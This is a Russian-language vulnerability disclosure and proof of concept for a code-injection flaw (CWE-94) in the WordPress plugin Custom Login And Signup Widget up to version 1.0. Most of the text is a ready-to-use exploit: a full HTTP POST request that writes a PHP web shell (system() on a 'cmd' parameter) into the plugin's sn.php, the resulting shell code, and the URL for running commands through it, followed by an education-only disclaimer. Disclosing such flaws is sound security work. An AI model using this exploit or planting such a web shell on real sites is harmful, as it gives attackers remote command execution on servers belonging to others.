
Плагин WordPress Custom Login And Signup Widget версии <= 1.0 уязвим для произвольного выполнения кода.
Некорректный контроль генерации кода ('Code Injection') уязвимость в плагине bitto.Kazi Custom Login And Signup Widget позволяет авторизованным пользователям с правами администратора выполнять произвольный PHP-код.
Эта проблема затрагивает все версии до 1.0 включительно.
🔥 Базовая оценка: 9.1 (КРИТИЧЕСКИЙ)
CWE ID: CWE-94 – Некорректный контроль генерации кода ('Code Injection')
Плагин позволяет администраторам изменять содержимое файла sn.php через поле Имя отправителя на странице настроек.
Вводимые пользователем данные записываются напрямую в PHP-файл без санитизации или проверки.
В результате любой PHP-код, переданный в параметре text, будет сохранён в PHP-файле и выполнен при прямом запросе, что приводит к удалённому выполнению кода (RCE).
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
textsn.php (конфигурация плагина)<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php
После успешного внедрения получите к нему прямой доступ для выполнения команд через:
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id
.php.Этот проект создан исключительно в образовательных и исследовательских целях.
Любое использование предоставленной информации осуществляется на ваш собственный риск.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим контентом.